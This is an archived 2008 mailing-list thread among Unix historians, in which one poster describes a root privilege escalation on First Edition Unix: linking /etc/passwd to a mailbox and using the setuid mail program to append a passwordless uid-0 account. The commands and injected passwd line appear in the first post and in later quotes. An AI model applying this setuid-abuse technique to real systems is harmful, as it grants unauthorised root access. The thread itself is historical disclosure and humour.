The Unix Heritage Society mailing list
 help / color / mirror / Atom feed
* [TUHS] Some fun with 1st ed
@ 2008-05-03 19:20 Tim Newsham
  2008-05-03 19:24 ` Larry McVoy
  0 siblings, 1 reply; 5+ messages in thread
From: Tim Newsham @ 2008-05-03 19:20 UTC (permalink / raw)


All work and no play...

Here's a fun hack for first edition unix.  From MAIL (I) :

   When followed by the names of a letter and one or more people, the
   letter is appended to each person's mailbox.  Each letter is
   preceded by the sender's name and a postmark.

   A person is either the nameof an entry in the directory /usr, in
   which case the mail is sent to /usr/person/mailbox, or the path
   of a directory, in which case mailbox in that directory is used.

Mail is setuid root:

# ls -l /bin/mail
  80 surwr-  1 root   3940 Jan  1 00:00:00 mail

login as a non-root user (ie "bin"), create a file "letter" with the 
contents "hack::0:/:".  Run:

    @ ln /etc/passwd /tmp/mailbox
    @ mail letter /tmp

log out and log back in as "hack".  You are now root.  Cat /etc/passwd
and notice:

   From bin Jan  1 00:49:22
   hack::0:/:

clean up the file a little and enjoy your new elevated status.

Tim Newsham
http://www.thenewsh.com/~newsham/



^ permalink raw reply	[flat|nested] 5+ messages in thread

* [TUHS] Some fun with 1st ed
  2008-05-03 19:20 [TUHS] Some fun with 1st ed Tim Newsham
@ 2008-05-03 19:24 ` Larry McVoy
  2008-05-03 19:29   ` Wilko Bulte
  0 siblings, 1 reply; 5+ messages in thread
From: Larry McVoy @ 2008-05-03 19:24 UTC (permalink / raw)


We need to send out a security alert immediately.  This is serious.

On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> All work and no play...
> 
> Here's a fun hack for first edition unix.  From MAIL (I) :
> 
>    When followed by the names of a letter and one or more people, the
>    letter is appended to each person's mailbox.  Each letter is
>    preceded by the sender's name and a postmark.
> 
>    A person is either the nameof an entry in the directory /usr, in
>    which case the mail is sent to /usr/person/mailbox, or the path
>    of a directory, in which case mailbox in that directory is used.
> 
> Mail is setuid root:
> 
> # ls -l /bin/mail
>   80 surwr-  1 root   3940 Jan  1 00:00:00 mail
> 
> login as a non-root user (ie "bin"), create a file "letter" with the 
> contents "hack::0:/:".  Run:
> 
>     @ ln /etc/passwd /tmp/mailbox
>     @ mail letter /tmp
> 
> log out and log back in as "hack".  You are now root.  Cat /etc/passwd
> and notice:
> 
>    From bin Jan  1 00:49:22
>    hack::0:/:
> 
> clean up the file a little and enjoy your new elevated status.
> 
> Tim Newsham
> http://www.thenewsh.com/~newsham/
> _______________________________________________
> TUHS mailing list
> TUHS at minnie.tuhs.org
> https://minnie.tuhs.org/mailman/listinfo/tuhs

-- 
---
Larry McVoy                lm at bitmover.com           http://www.bitkeeper.com



^ permalink raw reply	[flat|nested] 5+ messages in thread

* [TUHS] Some fun with 1st ed
  2008-05-03 19:24 ` Larry McVoy
@ 2008-05-03 19:29   ` Wilko Bulte
  2008-05-03 19:34     ` Tim Newsham
  2008-05-19 17:35     ` [Unix-jun72] " Angus Robinson
  0 siblings, 2 replies; 5+ messages in thread
From: Wilko Bulte @ 2008-05-03 19:29 UTC (permalink / raw)


Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
> We need to send out a security alert immediately.  This is serious.

CERT to the rescue!  Man the barricades ! 

;-)

> On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> > All work and no play...
> > 
> > Here's a fun hack for first edition unix.  From MAIL (I) :
> > 
> >    When followed by the names of a letter and one or more people, the
> >    letter is appended to each person's mailbox.  Each letter is
> >    preceded by the sender's name and a postmark.
> > 
> >    A person is either the nameof an entry in the directory /usr, in
> >    which case the mail is sent to /usr/person/mailbox, or the path
> >    of a directory, in which case mailbox in that directory is used.
> > 
> > Mail is setuid root:
> > 
> > # ls -l /bin/mail
> >   80 surwr-  1 root   3940 Jan  1 00:00:00 mail
> > 
> > login as a non-root user (ie "bin"), create a file "letter" with the 
> > contents "hack::0:/:".  Run:
> > 
> >     @ ln /etc/passwd /tmp/mailbox
> >     @ mail letter /tmp
> > 
> > log out and log back in as "hack".  You are now root.  Cat /etc/passwd
> > and notice:
> > 
> >    From bin Jan  1 00:49:22
> >    hack::0:/:
> > 
> > clean up the file a little and enjoy your new elevated status.
> > 
> > Tim Newsham
> > http://www.thenewsh.com/~newsham/
> > _______________________________________________
> > TUHS mailing list
> > TUHS at minnie.tuhs.org
> > https://minnie.tuhs.org/mailman/listinfo/tuhs
> 
> -- 
> ---
> Larry McVoy                lm at bitmover.com           http://www.bitkeeper.com
> _______________________________________________
> TUHS mailing list
> TUHS at minnie.tuhs.org
> https://minnie.tuhs.org/mailman/listinfo/tuhs
--- end of quoted text ---

-- 
Wilko



^ permalink raw reply	[flat|nested] 5+ messages in thread

* [TUHS] Some fun with 1st ed
  2008-05-03 19:29   ` Wilko Bulte
@ 2008-05-03 19:34     ` Tim Newsham
  2008-05-19 17:35     ` [Unix-jun72] " Angus Robinson
  1 sibling, 0 replies; 5+ messages in thread
From: Tim Newsham @ 2008-05-03 19:34 UTC (permalink / raw)


> Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
>> We need to send out a security alert immediately.  This is serious.
>
> CERT to the rescue!  Man the barricades !

I did this once with a 7th edition vuln.  I think one is probably the 
limit :)

     http://www.securityfocus.com/archive/1/365038

>> Larry McVoy                lm at bitmover.com           http://www.bitkeeper.com
> Wilko

Tim Newsham
http://www.thenewsh.com/~newsham/



^ permalink raw reply	[flat|nested] 5+ messages in thread

* [Unix-jun72] [TUHS] Some fun with 1st ed
  2008-05-03 19:29   ` Wilko Bulte
  2008-05-03 19:34     ` Tim Newsham
@ 2008-05-19 17:35     ` Angus Robinson
  1 sibling, 0 replies; 5+ messages in thread
From: Angus Robinson @ 2008-05-19 17:35 UTC (permalink / raw)


An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20080519/5e492524/attachment.html>


^ permalink raw reply	[flat|nested] 5+ messages in thread

end of thread, other threads:[~2008-05-19 17:35 UTC | newest]

Thread overview: 5+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2008-05-03 19:20 [TUHS] Some fun with 1st ed Tim Newsham
2008-05-03 19:24 ` Larry McVoy
2008-05-03 19:29   ` Wilko Bulte
2008-05-03 19:34     ` Tim Newsham
2008-05-19 17:35     ` [Unix-jun72] " Angus Robinson

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).